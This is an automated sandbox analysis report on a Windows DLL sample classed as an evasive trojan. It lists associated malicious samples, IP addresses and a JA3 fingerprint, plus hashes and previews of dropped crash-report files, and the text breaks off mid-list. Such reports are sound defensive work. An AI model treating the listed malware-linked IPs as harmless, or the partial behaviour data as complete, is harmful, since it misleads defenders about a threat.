Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532314
Start date: 02.12.2021
Start time: 00:51:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: IGidwJjoUs (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal84.troj.evad.winDLL@36/14@0/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 47.2% (good quality ratio 43.7%)
                        • Quality average: 70.7%
                        • Quality standard deviation: 27.4%
                        HCA Information:
                        • Successful, ratio: 84%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 204.79.197.222, 13.89.179.12, 40.91.112.76, 52.251.79.25, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): fp.msedge.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, onedsblobprdcus17.centralus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, a-0019.a-msedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a-0019.standard.a-msedge.net, 1.perf.msedge.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, t-ring.msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        00:54:39 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                        00:55:56 | API Interceptor | 7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | Detection
                        45.63.5.129 | efELSMI5R4.dll | malicious

                          Domains

                          No context

                          ASN

                          Match:AS-CHOOPAUS
                          Associated Sample Name / URL | Detection | Context
                          efELSMI5R4.dll | malicious | 45.63.5.129
                          ImSL42AOtZ.exe | malicious | 45.63.36.79
                          spZRMihlrkFGqYq1f.dll | malicious | 66.42.57.149
                          spZRMihlrkFGqYq1f.dll | malicious | 66.42.57.149
                          iU17wh2uUd.exe | malicious | 149.28.253.196
                          iU17wh2uUd.exe | malicious | 149.28.253.196
                          Sz4lxTmH7r.exe | malicious | 149.28.253.196
                          7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe | malicious | 149.28.253.196
                          RFIlSRQKzj.exe | malicious | 45.32.115.235
                          setup_x86_x64_install.exe | malicious | 149.28.253.196
                          991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe | malicious | 149.28.253.196
                          MMUc2aeWxZ.exe | malicious | 149.28.253.196
                          0pvsj0MF1D.exe | malicious | 149.28.253.196
                          Linux_amd64 | malicious | 45.32.162.141
                          nkXzJnW7AH.exe | malicious | 149.28.253.196
                          67MPsax8fd.exe | malicious | 136.244.117.138
                          Linux_x86 | malicious | 45.77.44.252
                          uI6mJo4TJQ.exe | malicious | 149.28.253.196
                          uI6mJo4TJQ.exe | malicious | 149.28.253.196
                          M2jG6lMe7Y.exe | malicious | 202.182.120.6

                          JA3 Fingerprints

                          Match:51c64c77e60f3980eea90869b68c58a8
                          Associated Sample Name / URL | Detection | Context
                          efELSMI5R4.dll | malicious | 45.63.5.129
                          TYLNb8VvnmYA.dll | malicious | 45.63.5.129
                          2gyA5uNl6VPQUA.dll | malicious | 45.63.5.129
                          spZRMihlrkFGqYq1f.dll | malicious | 45.63.5.129
                          spZRMihlrkFGqYq1f.dll | malicious | 45.63.5.129
                          fehiVK2JSx.dll | malicious | 45.63.5.129
                          kQ9HU0gKVH.exe | malicious | 45.63.5.129
                          gvtdsqavfej.dll | malicious | 45.63.5.129
                          mhOX6jll6x.dll | malicious | 45.63.5.129
                          dguQYT8p8j.dll | malicious | 45.63.5.129
                          jSxIzXfwc7.dll | malicious | 45.63.5.129
                          mhOX6jll6x.dll | malicious | 45.63.5.129
                          X2XCewI2Yy.dll | malicious | 45.63.5.129
                          dguQYT8p8j.dll | malicious | 45.63.5.129
                          date1%3fBNLv65=pAAS.dll | malicious | 45.63.5.129
                          HMvjzUYq2h.dll | malicious | 45.63.5.129
                          s9BZBDWmi4.dll | malicious | 45.63.5.129
                          bFx5bZRC6P.dll | malicious | 45.63.5.129
                          c7IUEh66u6.dll | malicious | 45.63.5.129
                          HMvjzUYq2h.dll | malicious | 45.63.5.129

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_88e9c9cb640b4f665f2020b110738337d7578_d70d8aa6_1abcca4e\Report.wer
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.6752625502343687
                          Encrypted:false
                          SSDEEP:96:CcDjZqy1y9hkoyt7Jf0pXIQcQ5c6A2cE2cw33+a+z+HbHgjVG4rmMOyWZAXGng5u:hBKHnM28jj/q/u7stS274ItW
                          MD5:25CC53A9A19F4661D37FA80AD23302F1
                          SHA1:33ECA18CB2A5714055E539CA8025E81FB2C758FC
                          SHA-256:236B1E7B6982B9AB6DC2CB26E142C055BBEFD18FF6BDB9F26EC019602C85AF75
                          SHA-512:B7D88A0100BE52C0D88FB5530991778B233E742E2D687B84C78ED1A0E6F3D6B5616225156D59DC67A00D11CA255FD073408F9D781BCBBB311A65107C84F8907C
                          Malicious:false
                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.7.6.4.6.0.6.8.0.2.7.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.2.5.0.8.d.c.-.b.3.4.8.-.4.8.6.8.-.9.4.9.6.-.3.9.c.f.e.f.9.4.3.5.a.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.c.8.e.3.1.4.-.5.0.f.1.-.4.b.4.2.-.a.b.3.2.-.9.6.a.5.3.6.8.7.8.3.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.8.-.0.0.0.1.-.0.0.1.b.-.2.3.c.1.-.6.3.7.2.0.e.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0d790757\Report.wer
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.6785382072555216
                          Encrypted:false
                          SSDEEP:96:CQfWFS5yBjZqyOy9hk1Dg3fWpXIQcQ55c65HcETcw3k+a+z+HbHgjVG4rmMOyWZD:qo5y7BWHpt5Oj/q/u7stS274ItWu
                          MD5:88F617AF6080EDEF1C47006810095DAA
                          SHA1:3D21887A9A4ED40A09AC5E34CEE78277A246C143
                          SHA-256:554270AFF664AAFFCD47524C00F1073E42E83E20CB55DAFB7A72781876A8669C
                          SHA-512:53CCBAB573B4D39E636957D64CCDCF32ABEDFD0827F4644CE2784C4BC1096E2C0D7D9C218493CFB9246045C0EF7AEBFAA957E909FAB7186E07B1E64CE15283C2
                          Malicious:false
                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.7.6.4.6.9.0.1.0.4.1.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.7.6.4.7.8.5.5.7.2.5.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.c.8.0.4.4.d.-.7.e.d.7.-.4.e.e.0.-.9.9.7.2.-.d.1.4.f.0.b.e.9.0.5.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.6.9.2.9.7.b.-.6.a.a.5.-.4.4.9.4.-.8.0.d.c.-.5.9.2.4.f.e.e.e.c.0.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.8.-.0.0.0.1.-.0.0.1.b.-.2.3.c.1.-.6.3.7.2.0.e.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER42EA.tmp.csv
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):50030
                          Entropy (8bit):3.054147686736165
                          Encrypted:false
                          SSDEEP:1536:KDHBHa6Nhq/xO6qJx7ZVUWy1aeQHQRq5FnwBc:KDHBHa6Nhq/xO6qJx7ZVUWy1aeQHQRqD
                          MD5:DB316FD905C5EEC16689FBF1188FF219
                          SHA1:E9B1316080E88C59E7A40FBBA7460625D30AE0A0
                          SHA-256:2BDF36F9AAAC312455E5758250AE9A86845C3E3F27CEFAE6E8F8530E0481C161
                          SHA-512:D0933B8AFF200BF926569B5BB346CE11808C732DBFFDC867C41837D97F28CFF6F3087745CA6E52157C1F5292948E9057918DC3328F3D88FE20FD513CEB398A75
                          Malicious:false
                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4731.tmp.txt
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13340
                          Entropy (8bit):2.695477969437785
                          Encrypted:false
                          SSDEEP:96:9GiZYWgxMOGLbY2YF7rW5H3YEZD/Ftk0i7PL+ywHrabP0aIDCZylOIBr3:9jZDrhIW/tEsaIDyylZBr3
                          MD5:1209E9856FAAC6EE0EBA4C9651FE3D2E
                          SHA1:1C287B56C1F4F1995A0BE8D4782C6C5BC380D20F
                          SHA-256:6E9CBD4477736F6D621027C286969B6CFBEAFA6AA92300A4F44E12598A20BAD1
                          SHA-512:0B725614CC5D8BBCA42AA5B49DE130FEFF8A642319C42C07C681726A393E20447327AF5275CC0ECD0278E1E5D538D7519B29ABA40EC34EA603B1E209946492BC
                          Malicious:false
                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6578.tmp.csv
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):49640
                          Entropy (8bit):3.0548950330398768
                          Encrypted:false
                          SSDEEP:1536:DFHpHg6Hk/xdqJm/6RGkUzy1aChH9JilOUEs:DFHpHg6Hk/xdqJm/6RGkUzy1aChH9JiF
                          MD5:7863E9D9221D3FBF2399DB5AF9DEF6B7
                          SHA1:2DD938F1431660404BE4B3EF39AA57E6C3FDD144
                          SHA-256:167A77564754A61CB6875DD0B654B29EDD3FC7E6DDD75FA82B5F21E4B6DB0B62
                          SHA-512:E2C0BB85E449DC3CD53F86A2FD00B2D0BCF6B747EFBE7BCBA1A2B0BB3FBCA9755C76B2946AFBAC34203F31F87C1EEF685EB7B3E577A98D6BCE1A95A46A98FB2E
                          Malicious:false
                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6896.tmp.txt
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13340
                          Entropy (8bit):2.6949302636440335
                          Encrypted:false
                          SSDEEP:96:9GiZYWQ0OZNLAY+GYPWOZHDYEZFUItFidPe+fw1LfaWGrfiwIhA3:9jZD3JGcUELaWGrfiHhA3
                          MD5:0DB248CBA273C43C6A6B69E38B7E724D
                          SHA1:9921F602B78EC02EFDEEF824E843544F4320952A
                          SHA-256:01AEDC7579FF57CDFDADED143AA5F40032984CEA68063CB658A2BAE76D8367FC
                          SHA-512:21AB0FC7B1E591EC6A91B2CEE377804FDDBE3855BB2227D93C9EF34D6E9EC7DE627C53A9B4414EE0B229368CF81B5C98F65152AF1BEB34DA278F1C3B95D35B30
                          Malicious:false
                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBD7.tmp.dmp
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 1 23:54:21 2021, 0x1205a4 type
                          Category:dropped
                          Size (bytes):25952
                          Entropy (8bit):2.5479659724080994
                          Encrypted:false
                          SSDEEP:192:TiDG6u6spOt1fhX7XAqki6+Hr38MuGe44NQ7y:PANrfl2iL38MuGe3
                          MD5:E1A30403EED9771979C9650D013EC47D
                          SHA1:076661FCF34BEF8F26632B0B057C674CF3EB4CC5
                          SHA-256:BC39011699A393049A13127695D3275B89C15DB4A64D057D66E9EC770D73B9FF
                          SHA-512:F4F17AD966CD71DAD028A582EC4BD2349DE1C0C63B6A8AA53E3505BEECAF149B12182D0B9C8560B0419F804F45927DAD3A689DDDCF16C475520885DC7F5F157B
                          Malicious:false
                          Preview: MDMP....... .......-..a............4...............H.......$...........................`.......8...........T...........h....X...........................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEC6.tmp.WERInternalMetadata.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8340
                          Entropy (8bit):3.703515995405675
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNi0d6Y6YrBSUKogmfOSz3+pBU89bKusfRum:RrlsNi+6Y6YtSUKogmfOSzgKtfB
                          MD5:45A99EB6F7CDE7E0DF4A21A1559328AB
                          SHA1:9465E6CB513F9B45CCF4D1FB0EF88C66DE804495
                          SHA-256:662E516BDCCF642EE2AD6CB7DCEE1335EE98068A32458DA8036C8C9A49468F87
                          SHA-512:205A9F77F77B2066F68306C34F5489C7D912C5A968270532A93DB56F3E09DC2076CFBEFC2981F167134F5AF1D09E3ADAE742DC4529878C832D4D5BD32387A942
                          Malicious:false
                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.8.<./.P.i.d.>.......
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC34B.tmp.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4598
                          Entropy (8bit):4.478723336936157
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zs8JgtWI90CkgwSWSC8BgM8fm8M4J2yvZFP+q84WzZyKcQIcQwQyd:uITf6frgwzSNaxJBLwZyKkwQyd
                          MD5:65A742620F6F9B0AB1DA05AB57E36B71
                          SHA1:3E2CC66D1F3A55506A3B1AF09743A04127D46DF2
                          SHA-256:B5D59C26CC24E65876D68F0277C1707BB5AA9FBFBC8AC6BA143B2CA1C863F2DE
                          SHA-512:71ECC6CD82EC8BAE0757B6426C28646AC2EC3E6DE1C86BC5AEBB41F6E84C6611B87229E8090FBE87B2477361504B96C40E06F74AC910C68C1EB1E8ED8CBAA8F1
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279265" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC5F.tmp.dmp
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 1 23:54:29 2021, 0x1205a4 type
                          Category:dropped
                          Size (bytes):1058968
                          Entropy (8bit):1.3634743704673724
                          Encrypted:false
                          SSDEEP:1536:v9+iGC6hao+C30BRC38srMs9TTfGdvblT98kLpvauTYLx05f:vPk36s38ITT0laUauE105f
                          MD5:36C4A2EFB238E98383A4DA1690926559
                          SHA1:62E82195C1A515A566E2A7ED27F8BE83B1D33783
                          SHA-256:FD1409A26E79C02A441D26CAE2BF474FE84D822607B0256F1B8BF59CFDAEF049
                          SHA-512:62294FBEC73AED3CD1C75D42F6DE49FCC22AE9F3FCD7474C5C886B3497A1F125966376A1398D849AF9C846B0F1E3F037B0118E9A563D52CC1CDA4B694200E0DE
                          Malicious:false
                          Preview: MDMP....... .......5..a............4...............H.......$...........................`.......8...........T...........@...X............................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE365.tmp.WERInternalMetadata.xml
